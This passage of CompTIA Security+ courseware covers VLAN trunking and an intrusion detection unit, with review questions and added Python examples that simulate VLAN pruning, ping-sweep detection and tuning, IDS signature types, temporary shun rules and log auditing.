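automatic versus manual VLAN pruning (added example, not vendor code).

Port modes, VLAN numbers and switch names are constructed, and nothing here
maps to a real switch CLI. It shows the two mitigations the text recommends:
a port that is not configured as a trunk refuses trunk negotiation, and a
trunk with a manually configured allowed-VLAN list keeps pruning a VLAN even
after a port on the far switch is moved into it.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Set

ACCESS, TRUNK, DYNAMIC = "access", "trunk", "dynamic"   # port modes


@dataclass
class Port:
    mode: str = ACCESS
    vlan: int = 1           # access VLAN (ignored once the port is a trunk)
    enabled: bool = True


class Switch:
    def __init__(self, name: str):
        self.name = name
        self.ports: Dict[int, Port] = {}

    def configure(self, num: int, mode: str = ACCESS, vlan: int = 1,
                  enabled: bool = True) -> None:
        self.ports[num] = Port(mode, vlan, enabled)

    def member_vlans(self) -> Set[int]:
        """VLANs with at least one enabled non-trunk port on this switch."""
        return {p.vlan for p in self.ports.values() if p.enabled and p.mode != TRUNK}

    def negotiate_trunk(self, num: int) -> bool:
        """A connected device asks the port to become a trunk. Only a DYNAMIC
        (auto-negotiating) port accepts; a port configured as access or trunk
        keeps its mode. Returns whether the port is a trunk afterwards."""
        port = self.ports[num]
        if port.enabled and port.mode == DYNAMIC:
            port.mode = TRUNK
        return port.enabled and port.mode == TRUNK


@dataclass
class Trunk:
    """Trunk link from `near` to `far`. allowed=None means automatic pruning:
    carry whatever VLANs currently have member ports on the far switch."""
    near: Switch
    far: Switch
    allowed: Optional[Set[int]] = None

    def carries(self, vlan: int) -> bool:
        if self.allowed is not None:      # manual list: far-side changes cannot widen it
            return vlan in self.allowed
        return vlan in self.far.member_vlans()


ACCOUNTING, MARKETING, SHOP = 10, 20, 30    # constructed VLAN numbers


def demo() -> dict:
    office = Switch("office")
    office.configure(1, ACCESS, ACCOUNTING)
    office.configure(2, DYNAMIC, MARKETING)   # factory default on some switches
    office.configure(3, ACCESS, MARKETING)    # hardened: auto-negotiation off

    shop = Switch("mechanic shop")
    shop.configure(1, ACCESS, SHOP)
    shop.configure(2, ACCESS, SHOP, enabled=False)   # unused port, turned off

    auto = Trunk(office, shop)                 # default: automatic pruning
    manual = Trunk(office, shop, allowed={SHOP})

    results = {
        "dynamic_port_becomes_trunk": office.negotiate_trunk(2),
        "access_port_stays_access": not office.negotiate_trunk(3),
        "auto_prunes_accounting": not auto.carries(ACCOUNTING),
        "manual_prunes_accounting": not manual.carries(ACCOUNTING),
    }
    # The scenario from the text: a port on the shop switch ends up in Accounting.
    shop.configure(2, ACCESS, ACCOUNTING)
    results["auto_now_carries_accounting"] = auto.carries(ACCOUNTING)
    results["manual_still_prunes_accounting"] = not manual.carries(ACCOUNTING)
    return results
```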
For more information on VLANs, go to:
    http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lanswtch.htm

Do it!              D-1:    Discussing VLANs and trunking
                     Questions and answers
                      1 Major trunking protocols include which of the following? (Choose all that apply.)
                        A      IEEE 802.1q
                        B      IEEE 802.3
                        C      Cisco’s proprietary Inter-Switch Link (ISL)
                        D      IEEE 802.10

                      2 VLANs are often coupled with a complementary technology, called _________,
                        which allows switches to share many VLANs over a single physical link.
                        A      spanning tree
                        B      network address translation
                        C      trunking
                        D      pruning

                      3 When referring to VLANs, pruning refers to removing unneeded VLANs from the
                        trunk. True or false?

                        True

                      4 VLANs are used throughout networks to segment, or separate, different hosts
                        from each other on the network. True or false?

                        True


Unit summary: Network security topologies
Topic A   In this topic, you learned that security zones offer another dimension of network
          security. You learned how the DMZ, intranet, and extranet fit within this
          model. You also considered how the security policy should be developed to include
          these security zones.
Topic B   In this topic, you examined the Network Address Translation (NAT) and Port
          Address Translation (PAT) technologies and their role in safeguarding the network.
          You learned how to configure a router with NAT and to filter Internet traffic for IP
          addresses and ports.
Topic C   In this topic, you learned how tunneling can be used to securely connect networks over
          public infrastructures.
Topic D   In this topic, you learned that Virtual LANs (VLANs) are used to divide a physical
          network into multiple network segments. This isolates sensitive traffic, as in the case of
          Accounting or Human Resources, from the rest of the corporate network. It also reduces
          the range of access should a hacker infiltrate the network.

          Review questions
           1 Which security zone should contain your Web, FTP, and mail servers?
              A Intranet
              B   DMZ
              C Extranet
              D VPN
           2 Which security zone describes a configuration where the internal network of one
             company is available to another for B2B transactions?
              Extranet

           3 Which network service(s) allows internal addresses to be hidden from outside
             networks?
              A   NAT

              B   DMZ

              C VLAN
              D VPN
           4 PAT allows many hosts to share a single IP address by combining the IP address
             with a unique ________________.
              TCP/UDP port number
11–30 CompTIA Security+ Certification

                     5 Which networking technology enables a host to securely send its data through an
                       untrusted or public network infrastructure?
                       A Pruning
                       B   Tunneling

                       C Extranet
                       D Perimeter network
                     6 Which of the following ports are necessary for allowing DNS traffic?
                       A   TCP 53

                       B TCP 80
                       C   UDP 53
                       D UDP 80
                     7 What are the benefits of a VLAN?
                       A It hides the internal IP address from external networks.
                       B   It segments traffic on the internal network for increased security.
                       C It provides a secure tunnel from between two extranets.
                       D It filters incoming traffic for selected IP and port addresses.
                     8 What are vulnerabilities of the VLAN?
                       A   A compromised host can negotiate a trunk connection with the switch, giving the
                           attacker access to the entire network.
                       B A host’s broadcasts can be seen by other network segments.
                       C A sniffer can be physically inserted into a specific targeted network segment.
                       D   Automatic pruning permits an attacker to reconfigure a switch’s port to forward
                           traffic to a different segment.


Unit 12
Intrusion detection
                      Unit time: 120 minutes

                      Complete this unit, and you’ll know how to:

                      A Explain intrusion detection systems and
                         identify some of the major characteristics
                         of intrusion detection products.

                      B Detail the differences between host-based
                         and network-based intrusion detection.

                      C Identify active detection and passive
                         detection features of both host- and
                         network-based IDS products.

                      D Explain honeypots and how they are
                         employed to increase network security.

                      E Outline the proper response to an attack.


Topic A: Intrusion detection systems
Explanation          Much like closed-circuit television systems employed in workplaces to monitor and
                     increase security, intrusion detection systems (IDS) are monitoring devices on the
                     network that help security administrators to identify attacks in progress, stop them, and
                     to conduct forensic analysis after the attack is over.
                     Intrusion detection is an important part of a commonly used security strategy known as
                     defense in depth. Defense in depth is a multi-layered security approach that uses
                     multiple techniques such as preventative technologies, security monitoring, and attack
                     response to provide a robust security architecture.
                     Intrusion detection provides monitoring of network resources to detect intrusions and
                     attacks that were not stopped by the preventative techniques. For many reasons, it is
                     impossible for firewalls to prevent all attacks. Some attacks occur from inside the
                     network, and as such do not need to pass through the firewall to reach their victim hosts.
                     Other attacks can occur from the outside, but use traffic permitted by the firewall.
                     Intrusion detection systems are complementary to blocking devices because they can
                     monitor the attack after it crosses through the firewall, either as it passes across the
                     wire, or as it is seen by the victim host.
                     Similar to virus scanners, intrusion detection systems compare traffic to signature files
                     that recognize specific known types of attack. These files are usually provided by the
                     hardware or software vendor and are updated on a subscription basis. Additionally,
                     intrusion detection systems can detect anomalies. Any pattern of traffic that deviates
                     from the expected sequence of packets during a session might be suspect and cause a
                     network manager to be notified. By employing this technique, even attacks that are too
                     new to appear in the signature file might be flagged for manual analysis by an
                     administrator who might be able to stop an attack or mitigate its effect.
                     Intrusion detection tools also assist in protecting organizations by expanding the options
                     available to manage the risk from threats and vulnerabilities. Since the modus operandi
                     of intrusion detection systems is to monitor activity, either on the network segment or
                     on the host, they gather useful information that can not only be used to detect an
                     attacker, but also to identify and stop him, support investigations to understand the
                     attacker’s strategy, and to prevent the strategy from being successful in the future.
                     Intrusion detection systems are a very powerful tool in a security administrator’s tool
                     kit.

                     Negatives and positives
                     Above all, an IDS must correctly identify intrusions and attacks. False positives and
                     false negatives refer to situations in which the intrusion detection system does not
                     correctly categorize an activity as an attack or as benign. There are really only two
                     possible decisions for each activity that an IDS observes: the activity can be identified
                     as an attack, or it can be identified as benign.

Because the IDS can be either correct or incorrect in their determination about the type
of activity, there are four possibilities to describe the correctness of IDS determinations:
    • True positives — Occur when the IDS correctly identifies undesirable traffic.
    • True negatives — Occur when the IDS correctly identifies normal traffic.
    • False positives — Occur when the IDS incorrectly identifies normal traffic as an
      attack.
    • False negatives — Occur when the IDS incorrectly identifies an attack as normal
      traffic.

False negatives
False negatives imply that the IDS failed to detect an attack, a very undesirable
situation. False negatives typically occur when the pattern of traffic is not identified in
the signature database, such as with a new attack. False negatives can also occur with
network-based IDS when the sensor is not able to analyze passing traffic fast enough.
For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec worth of
traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets
when the volume of traffic on the segment surpasses its 40 Mb/sec capability. IDS are not
infallible, and false negatives do indeed occur on a regular basis.
The problem of false negatives can be dealt with in two ways. First, a combination of
network-based and host-based IDS can be used to obtain more even coverage. The
combination also helps to gather more data on attacks that can help administrators
analyze the attack more effectively. Second, NIDS can be deployed at multiple strategic
locations in the network. That way, an attack missed by one NIDS, on the server farm’s
network segment, for example, might be caught by the NIDS just inside the firewall.

False positives
False positives happen when the IDS mistakenly reports certain benign activity as
malicious. Best-case false positives require human intervention to diagnose the event.
Worst-case false positives can cause the legitimate traffic to be blocked by a router or
firewall.
Obviously, false positives are undesirable because they require the time of a security
administrator—an expensive commodity—to analyze and sort out the problem. All IDS
products on the market today are subject to false positives. Especially just after
deployment, IDS can be expected to produce a relatively high volume of false positives,
which are reduced over time using a process called tuning.
The tuning process allows the administrator to instruct sensors not to alarm, based on
parameters such as signature type, and source or destination IP address. One common
example is a network management program that pings devices to ensure that they are
functioning. This behavior resembles a reconnaissance technique called a ping sweep,
which attackers can use to determine which IP addresses are up and available to attack.
It also triggers an alarm from an NIDS. Although ping sweeps can indicate malicious
activity, the alarm is a false positive when the ping sweep is conducted by an authorized
host, the network management system. To prevent the NIDS sensor from alarming on a
false positive, it can be configured not to alarm on ping sweeps from the network
management system’s IP address. Tuning is an essential step in any IDS deployment.
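The ping-sweep scenario above, worked through in code. This is an added example, not part of the course material or any vendor's product: a small detector that flags a source which echo-requests many distinct destinations in a short window, a tuning exception for the management system's address, and a scorer that sorts every source into the four outcome categories (true/false positive, true/false negative). All traffic, addresses (10.0.0.5 as the management system, 198.51.100.7 as the outside prober) and thresholds are constructed for the example.

```python
"""Ping-sweep detection, tuning, and outcome counting (constructed example)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float      # seconds since capture start
    src: str       # source IP address
    dst: str       # destination IP address
    proto: str     # "icmp-echo" for echo requests, anything else otherwise


# Constructed sample traffic. 10.0.0.5 plays the network management system
# polling its subnet, 198.51.100.7 an outside host probing a DMZ range, and
# 10.0.0.20 an ordinary workstation. None of these are real observations.
SAMPLE_EVENTS = (
    [Event(float(i), "10.0.0.5", f"10.0.0.{i + 1}", "icmp-echo") for i in range(12)]
    + [Event(100.0 + i * 0.2, "198.51.100.7", f"192.0.2.{i + 1}", "icmp-echo")
       for i in range(10)]
    + [Event(200.0, "10.0.0.20", "10.0.0.1", "icmp-echo"),
       Event(201.0, "10.0.0.20", "10.0.0.1", "icmp-echo"),
       Event(202.0, "10.0.0.20", "10.0.0.9", "tcp")]
)

# Ground truth for the constructed sample: only the outside probe is an attack.
ATTACK_SOURCES = frozenset({"198.51.100.7"})


def detect_ping_sweeps(events, window=10.0, threshold=8, suppress_src=frozenset()):
    """Flag sources that echo-request at least `threshold` distinct destinations
    within any `window`-second span. Sources in `suppress_src` are the tuning
    exceptions: their echo requests are ignored by this signature only."""
    by_src = defaultdict(list)
    for ev in events:
        if ev.proto == "icmp-echo" and ev.src not in suppress_src:
            by_src[ev.src].append(ev)
    flagged = set()
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):          # sliding time window
            while evs[end].ts - evs[start].ts > window:
                start += 1
            if len({e.dst for e in evs[start:end + 1]}) >= threshold:
                flagged.add(src)
                break
    return flagged


def outcome_counts(events, flagged, attack_sources):
    """Score each source seen in the traffic as TP, TN, FP or FN."""
    counts = {"TP": 0, "TN": 0, "FP": 0, "FN": 0}
    for src in {ev.src for ev in events}:
        attacker, alarmed = src in attack_sources, src in flagged
        if alarmed and attacker:
            counts["TP"] += 1
        elif alarmed:
            counts["FP"] += 1
        elif attacker:
            counts["FN"] += 1
        else:
            counts["TN"] += 1
    return counts


def untuned_and_tuned():
    """Run the sensor before and after tuning out the management host."""
    before = detect_ping_sweeps(SAMPLE_EVENTS)
    after = detect_ping_sweeps(SAMPLE_EVENTS, suppress_src=frozenset({"10.0.0.5"}))
    return (outcome_counts(SAMPLE_EVENTS, before, ATTACK_SOURCES),
            outcome_counts(SAMPLE_EVENTS, after, ATTACK_SOURCES))


if __name__ == "__main__":
    print(untuned_and_tuned())
```

Before tuning, the management host is reported alongside the real probe (one true positive, one false positive); after the source-specific exception, only the probe remains. Note that the exception is scoped to this one signature and one address, which is how a tuning rule should be written: suppressing all alarms from the management host would blind the sensor if that host were ever compromised.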

Do it!              A-1:      Detecting intrusion
                      Questions and answers
                       1 What is defense in depth?

                          This is a multilayered security approach that uses multiple security techniques such as
                          preventative technologies, security monitoring, and attack response.

                       2 Intrusion detection provides monitoring of network resources to detect intrusions
                         and attacks that were not stopped by the preventative techniques. True or false?

                          True

                       3 Intrusion detection systems identify attacks by comparing traffic to signature files
                         with known types of attack and detecting anomalies. True or false?

                          True

                       4 False negatives happen when the IDS mistakenly reports certain benign activity as
                         malicious. True or false?

                          False. These are false positives.

                       5 What measures can you take to reduce false negatives?
                          A      Combine network-based and host-based IDS.
                          B      Tune the IDS to accept specific signature types or source or destination IP
                                 addresses.
                          C      Deploy NIDS at multiple strategic locations in the network.
                          D      Reduce the traffic speed.


Topic B: Network-based and host-based IDS
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                     type, and understand the implementation and configuration of each kind of intrusion detection
                     system
                      • Network Based
                      • Host Based




              Types of IDS
Explanation   The two types of intrusion detection systems on the market today are host-based and
              network-based. The essential difference between them is the scope of activity that they
              monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network
              traffic while host-based IDS (HIDS) monitor activity on a particular host machine.

              Network-based IDS
              NIDS sensors are dedicated network devices or servers that monitor traffic on one or
              more network segments. The sensors usually have two network connections, one that
              operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is
              used to send data such as alerts to a centralized management system. The configuration
              is shown in Exhibit 12-1.




              Exhibit 12-1: NIDS monitoring and management interfaces

              Because NIDS analyze all passing traffic, they can be used to protect an entire network
              segment—or the entire organization—depending on their placement within the network.
              The primary constraint for NIDS is the occasional inability to keep up with the pace of
              network traffic.

                  NIDS architecture
                  One of the key questions that arise in deploying NIDS is, where in the network do
                  sensors belong? Because it is not cost-effective or even manageable to deploy sensors
                  on all network segments, careful consideration needs to be given as to where they are
                  deployed.
                  To determine how to deploy IDS, one needs only answer the question: What do I most
                  need to protect? The decision of where to deploy IDS should be driven by the value
                  your organization places on its information assets. This is because NIDS sensors are
                  placed strategically in the network to defend assets that are considered the most
                  valuable where they will offer the most protection. Typical locations for IDS sensors
                  include:
                      • Just inside the firewall
                      • On the DMZ
                      • On any subnets containing mission-critical servers
                  Just inside the firewall is a common location for IDS because it is the bottleneck
                  through which all inbound and outbound traffic must pass. In this location, sensors are
                  able to inspect every packet coming into or out of the organization’s network, provided
                  there are no other avenues such as dial-up connections or extranet connections that the
                  attacker can use.
                  The DMZ is another good location for IDS, because the publicly reachable hosts located
                  there are frequently attacked from the Internet. If a good security policy is implemented
                  (which likely disallows connectivity from the Internet directly to the inside network),
                  then the DMZ is the attacker’s first point of entry into the network. Once a DMZ host
                  has been compromised, the attacker attempts to penetrate the trusted network. IDS in
                  this location can help to identify and stop intruders before they are able to do so.
                  Finally, consider placing the sensor on any subnets containing mission-critical
                  application servers, such as those performing financial, logistical, and human resources
                  functions. By placing the sensor on these segments, the organization can defend its
                  servers from attacks originating from inside the network.

                  NIDS signature types
                   Signature-based IDS look for patterns in packet payloads that indicate a possible attack.
                   When the sensor finds a packet payload that matches a string pattern in its signature
                   set, it identifies the packet as an attack and alerts the administrator.
                  An IDS based on another signature type, port signature, simply watches for connection
                  attempts to a known or frequently attacked port. These could be ports used by Trojan
                  horse programs, or other malware, or they could simply be well-known ports in a packet
                  destined for part of the network where the corresponding service should not exist. For
                  example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined
                  for the DMZ could be marked as suspicious.
                  Finally, IDS based on header signatures watch for dangerous or illogical combinations
                  in packet headers. One well-known example is a packet generated by the attack tool
                  WinNuke. WinNuke creates packets destined for a NetBIOS port, with the Urgent
                  pointer, or Out Of Band pointer set. This packet crashes older Windows systems. A
                  NIDS based on header signatures identifies this type of packet as an attack, because the
                  attack is contained in the packet’s header and not in the payload.

Because new vulnerabilities are constantly identified by the security community,
signature-based intrusion detection systems must be kept up to date with the latest
signatures, much the same way virus definitions in virus scanning software need to be
kept current with the latest developments in the security arena. The time between when
the new attack first becomes available and when it becomes known to the security
community (which then produces a signature for the attack) represents a vulnerability of
signature-based IDS, because attackers are free to use the new exploit without fear of
detection during that time period. IDS vendors do commonly provide signature update
services, and e-mail customers when new signatures become available. To minimize
vulnerability, it is critical that IDS be loaded with the latest signatures.
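The three signature types described above (payload, port, and header) side by side, as an added example that is not code from the course or from any IDS vendor. Each signature is a small function over a constructed packet record; the DMZ range (203.0.113.0/24), the payload string (a labelled placeholder, not a real exploit pattern), and the sample packets are all assumptions made for the example.

```python
"""Payload, port and header signatures over constructed packets (added example)."""
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str                       # "tcp" or "udp"
    dport: int                       # destination port
    flags: frozenset = frozenset()   # TCP flag names, e.g. {"SYN"} or {"PSH", "ACK", "URG"}
    payload: bytes = b""


# Assumed DMZ address range for this example (documentation prefix, not a real site).
DMZ = ip_network("203.0.113.0/24")

# Constructed payload pattern standing in for a vendor content signature.
PAYLOAD_PATTERN = re.compile(rb"EXAMPLE-ATTACK-PATTERN")


def payload_signature(pkt):
    """Content signature: a byte string in the application payload."""
    return "payload: example pattern" if PAYLOAD_PATTERN.search(pkt.payload) else None


def port_signature(pkt):
    """Port signature: a connection attempt to a service that should not exist
    on the destination network (telnet, TCP 23, is not used on the DMZ here)."""
    if pkt.proto == "tcp" and pkt.dport == 23 and ip_address(pkt.dst) in DMZ:
        return "port: telnet to DMZ"
    return None


def header_signature(pkt):
    """Header signature: an illogical header combination, here the URG flag on
    a segment to a NetBIOS port, as in the WinNuke case described above."""
    if pkt.proto == "tcp" and pkt.dport in (137, 138, 139) and "URG" in pkt.flags:
        return "header: URG to NetBIOS port"
    return None


SIGNATURES = (payload_signature, port_signature, header_signature)


def inspect(pkt):
    """Return the names of every signature the packet matches."""
    return [hit for sig in SIGNATURES if (hit := sig(pkt)) is not None]


# Constructed traffic: one benign HTTP request, a telnet attempt into the DMZ,
# an HTTP request carrying the placeholder pattern, a URG segment to TCP 139
# from outside, and a normal internal NetBIOS segment.
SAMPLE_PACKETS = [
    Packet("198.51.100.9", "203.0.113.10", "tcp", 80, frozenset({"PSH", "ACK"}),
           b"GET /index.html HTTP/1.0\r\n\r\n"),
    Packet("198.51.100.9", "203.0.113.10", "tcp", 23, frozenset({"SYN"})),
    Packet("198.51.100.9", "203.0.113.10", "tcp", 80, frozenset({"PSH", "ACK"}),
           b"POST /cgi-bin/x EXAMPLE-ATTACK-PATTERN HTTP/1.0\r\n"),
    Packet("198.51.100.9", "10.0.0.15", "tcp", 139, frozenset({"PSH", "ACK", "URG"}), b"\x00"),
    Packet("10.0.0.8", "10.0.0.15", "tcp", 139, frozenset({"PSH", "ACK"}), b"\x00"),
]


def alerts_for(packets):
    """Map packet index to its matched signatures; silent packets are omitted."""
    result = {}
    for i, pkt in enumerate(packets):
        hits = inspect(pkt)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for idx, hits in alerts_for(SAMPLE_PACKETS).items():
        print(idx, hits)
```

The header signature fires on packet 3 even though its payload is a single null byte, which is the point made above: the attack lives in the header, so a payload-only engine would miss it. The port signature depends entirely on a site-specific policy decision (telnet is not expected on the DMZ), which is why port signatures must be reviewed whenever a new service is deployed.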

Network IDS reactions
As has been previously noted, network-based IDS with active monitoring capabilities
are able to react when they detect an attack in progress. Typical reaction types include:
    • TCP resets
    • IP session logging
    • Shunning or blocking
Most active capabilities are configurable on a per-signature basis, meaning that the
sensor can perform IP session logging for some attacks, blocking for others, or simply
sound the alarm, depending on the organization’s requirements.
Note: Extreme care should be used with active sensor capabilities to prevent
interference with legitimate traffic. In practice, active capabilities are infrequently
implemented because of the risk that they could be used to deny service of legitimate
user traffic. When these capabilities are deployed, it is done after the sensors have been
carefully tuned and requires ongoing monitoring.

TCP resets
TCP resets operate by sending a TCP reset packet (which terminates TCP sessions) to
the victim host, spoofing the IP addresses of the attacker. Resets are sent from the
sensor’s monitoring or sniffing interface.
Although TCP resets can terminate an attack in progress, they cannot stop the initial
packet from reaching the victim. In some cases, a single packet is all that is required to
crash or compromise the victim host. Further, in order to successfully spoof the identity
of the attacking host (remember that the victim does not know that it is under attack and
sees the TCP session as being like any other session that should be protected from
session hijacking), the sensor must guess the correct TCP sequence number so that the
victim will accept the reset and end the session.

IP session logging
With IP session logging, the sensor records traffic passing between the attacker and the
victim. (Note that these records can be very useful for analyzing the attack and
preventing it in the future.) The limitation of logging is that only the trigger and the
subsequent packets are logged, so any preceding packets are lost. IP session logging can
also impact sensor performance and quickly consume large amounts of disk space.

                    Shunning
                    In shunning (also known as IDS blocking), the sensor connects to the firewall or a
                    packet-filtering router from its management interface and configures filtering rules that
                    block packets from the attacker. Proper authentication needs to be arranged to ensure
                    that the sensor can securely log into the firewall or router.
                     Shunning is usually a temporary measure (the rules are typically left in for a period of
                     minutes or hours) that buys administrators time to respond. Shunning is not typically a
                    permanent countermeasure. It is important to keep in mind that if the attacker has used a
                    spoofed source address in his attack, then the IDS sensor will actually block someone
                    other than the attacker (the legitimate owner of the spoofed IP address).
                    Note: Shunning takes place after a triggering packet has been noted by the sensor.
                    When it reaches the victim host, it can potentially inflict damage before the filtering rule
                    is in place.
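The two properties of shunning discussed above, that block rules are temporary and that a spoofed source address would cause the sensor to block the wrong party, can be made concrete in a small rule tracker. This is an added example, not the course's or any product's code: `push_rule` and `remove_rule` are caller-supplied callbacks standing in for whatever interface the firewall or router exposes, the TTL and the protected addresses (the gateway and DNS server) are assumptions, and the scenario in `run_scenario` is constructed.

```python
"""Temporary shun rules with expiry and a never-shun list (added example)."""


class ShunTable:
    """Tracks the temporary block rules a sensor has pushed to a firewall.

    `push_rule(ip)` and `remove_rule(ip)` are caller-supplied callbacks that
    stand in for the firewall's configuration interface, which differs by
    product. `never_shun` lists addresses that must not be blocked even if
    they appear as an attack source, because an attacker can spoof them."""

    def __init__(self, push_rule, remove_rule, never_shun=(), ttl=900):
        self.push_rule = push_rule
        self.remove_rule = remove_rule
        self.never_shun = frozenset(never_shun)
        self.ttl = ttl                 # seconds a rule stays in place
        self.active = {}               # ip -> expiry time

    def shun(self, ip, now):
        """Block `ip` until now + ttl. Returns False if the address is protected."""
        if ip in self.never_shun:
            return False
        if ip not in self.active:      # repeat triggers refresh the expiry only
            self.push_rule(ip)
        self.active[ip] = now + self.ttl
        return True

    def expire(self, now):
        """Remove rules whose TTL has passed; returns the addresses released."""
        released = sorted(ip for ip, exp in self.active.items() if exp <= now)
        for ip in released:
            self.remove_rule(ip)
            del self.active[ip]
        return released


def run_scenario():
    """Constructed sequence: a real probe is shunned, a packet whose source is
    spoofed as the DNS server is not, and the rule lapses after the TTL."""
    firewall_rules = []                # stand-in for the firewall's block list
    table = ShunTable(firewall_rules.append, firewall_rules.remove,
                      never_shun={"10.0.0.1", "192.0.2.53"},   # gateway, DNS server
                      ttl=600)
    t0 = 1_000_000.0
    shunned_probe = table.shun("198.51.100.7", t0)
    shunned_spoof = table.shun("192.0.2.53", t0 + 5.0)
    rules_during = list(firewall_rules)
    released_early = table.expire(t0 + 300.0)
    released_late = table.expire(t0 + 600.0)
    return (shunned_probe, shunned_spoof, rules_during,
            released_early, released_late, list(firewall_rules))


if __name__ == "__main__":
    print(run_scenario())
```

The never-shun list is the practical answer to the spoofing problem noted above: the addresses an organization cannot afford to lose (upstream gateway, DNS, the management system) are excluded before any automatic rule is pushed, and every rule carries an expiry so a forgotten entry cannot become a permanent outage.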

Do it!              B-1:      Discussing network-based IDS
                      Questions and answers
                       1 Network-based IDS (NIDS) monitor traffic on a host machine. True or false?

                          False. NIDS monitor traffic on the network.

                       2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP
                         reset packet to the victim host. True or false?

                          True

                       3 With IP session logging, the sensor records traffic passing between the attacker
                         and the victim. True or false?

                          True

                       4 The DMZ is a good location for IDS because the publicly reachable hosts located
                         there will be under constant attack from the Internet. True or false?

                          True

                       5 In shunning, the sensor connects to the firewall or a packet-filtering router from
                         what interface?
                          A      Management
                          B      IDS sensor
                          C      Desktop
                          D      Host sensor

                       6 A NIDS that watches for connection attempts to a known or frequently attacked
                         port uses _____________ detection.

                          port signature

              Host-based IDS
Explanation   Host-based IDS are used to protect a critical network server containing sensitive
              information. Host-based IDS agents (the actual HIDS software) only protect the host on
              which they are installed. Like any application, host-based IDS agents use resources on
              the host server (disk space, memory, and processor time), which can have some impact
              on system performance. HIDS can detect intrusions by analyzing the logs of operating
              systems and applications, resource utilization, and other system activity. Host-based
               IDS are primarily used to protect only critical servers, because it is not practical or
               cost-effective to install them on all systems.

              HIDS method of operation
              Host-based intrusion detection products have a wealth of methods that can be employed
              to detect and stop intrusions. A list of the more common techniques employed by
              modern HIDS products includes:
                  • Auditing of logs, including system logs, event logs, security logs, and syslog (for
                    Unix hosts).
                  • Monitoring of file checksums to identify changes.
                  • Elementary network-based signature techniques including port activity.
                  • Intercepting and evaluating requests by applications for system resources before
                    they are processed.
                  • Monitoring of system processes for suspicious activity.

              Log files
              Most HIDS products audit log files by monitoring changes to them. If a log file is
              changed, the HIDS product checks the new entry to see if it matches any of the HIDS
              attack signature patterns. If the log entry does match the attack signature, the HIDS alert
              administrators. Note that because logs reflect past events, file auditing cannot stop the
              action that sets off the alarm from taking place.
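Log auditing as described above, as an added example rather than course or vendor code: the auditor reads only the portion of the log that has been appended since its last run and matches each new line against a small set of signature patterns. The patterns are modelled on common syslog lines, the brute-force threshold of three failures is an assumption, and both log instalments are constructed.

```python
"""Incremental log auditing against attack-signature patterns (added example)."""
import re

# Constructed signature patterns modelled on common syslog lines; they are not a
# vendor's signature set.
LOG_SIGNATURES = {
    "failed-password": re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)"),
    "root-session": re.compile(r"su: .*session opened for user root by (\S+)"),
    "new-user": re.compile(r"useradd\[\d+\]: new user: name=([^,\s]+)"),
}


class LogAuditor:
    """Audits only the part of a log that has grown since the previous audit,
    the way a HIDS reacts to a change in the file rather than rereading it."""

    def __init__(self, signatures, fail_threshold=3):
        self.signatures = signatures
        self.fail_threshold = fail_threshold
        self.offset = 0                # characters already audited
        self.failures = {}             # source address -> failed login count

    def audit(self, log_text):
        """Return (signature, detail) alerts for the newly appended lines."""
        new_text = log_text[self.offset:]
        self.offset = len(log_text)
        alerts = []
        for line in new_text.splitlines():
            for name, pattern in self.signatures.items():
                match = pattern.search(line)
                if match is None:
                    continue
                if name == "failed-password":
                    # single failures are normal; alert once the threshold is hit
                    src = match.group(2)
                    self.failures[src] = self.failures.get(src, 0) + 1
                    if self.failures[src] == self.fail_threshold:
                        alerts.append(("brute-force", src))
                else:
                    alerts.append((name, match.group(1)))
        return alerts


# Constructed log contents in two instalments, as a HIDS would see the file grow.
LOG_PART1 = (
    "Mar  3 10:00:01 srv sshd[1001]: Accepted password for alice from 10.0.0.20 port 5000 ssh2\n"
    "Mar  3 10:00:05 srv sshd[1002]: Failed password for root from 198.51.100.7 port 40001 ssh2\n"
    "Mar  3 10:00:06 srv sshd[1003]: Failed password for root from 198.51.100.7 port 40002 ssh2\n"
)
LOG_PART2 = (
    "Mar  3 10:00:07 srv sshd[1004]: Failed password for invalid user admin from 198.51.100.7 port 40003 ssh2\n"
    "Mar  3 10:02:00 srv useradd[1100]: new user: name=tmpadmin, UID=1005, GID=1005, home=/home/tmpadmin, shell=/bin/sh\n"
)


def run_demo():
    auditor = LogAuditor(LOG_SIGNATURES)
    first = auditor.audit(LOG_PART1)               # two failures: below threshold
    second = auditor.audit(LOG_PART1 + LOG_PART2)  # third failure plus a new account
    third = auditor.audit(LOG_PART1 + LOG_PART2)   # nothing new since last audit
    return first, second, third


if __name__ == "__main__":
    print(run_demo())
```

The offset is what keeps the auditor from re-alerting on old entries each time the file changes. As the text notes, everything here is after the fact: by the time the `new-user` line is audited the account already exists, so this technique supports response and forensics rather than prevention.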

              File checksums
              File checksums are similar to log file audits in that they can detect past activity. Hashes
              are typically created only for critical system files that should change infrequently if at
              all. If frequently changing files are included in the file audit, the administrator will need
              to tune the IDS so that it does not generate alerts every time these files are changed. The
              tuning process can be used by administrators to learn which files they should expect to
              change and which should remain static.
              File checksum systems such as Tripwire can also be employed when full-fledged HIDS
              products are not available or practical for a particular environment. (Tripwire scans file
              systems and creates hashes of critical system files. The hashes are saved, and the
              program is periodically rerun to validate that the hash value for each file has not
              changed.) By employing such a product, administrators can be notified when an
              intrusion has occurred (because the attacker will almost certainly upload tools or change
              permissions to make access to the machine easier), and can be certain which files have
              been tampered with by the intruder. The modified files can be easily identified and
              refreshed from backups, eliminating the need to completely rebuild the server.
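A Tripwire-style integrity check of the kind described above, written here as an added example (it is not Tripwire's code or any product's): a baseline of SHA-256 hashes and permission bits is built for a set of monitored files and saved, then the check is rerun and reports modified, permission-changed, and missing files, with a tuning list for files that are expected to change. The files, their contents, and the intrusion scenario in `run_demo` are constructed in a temporary directory.

```python
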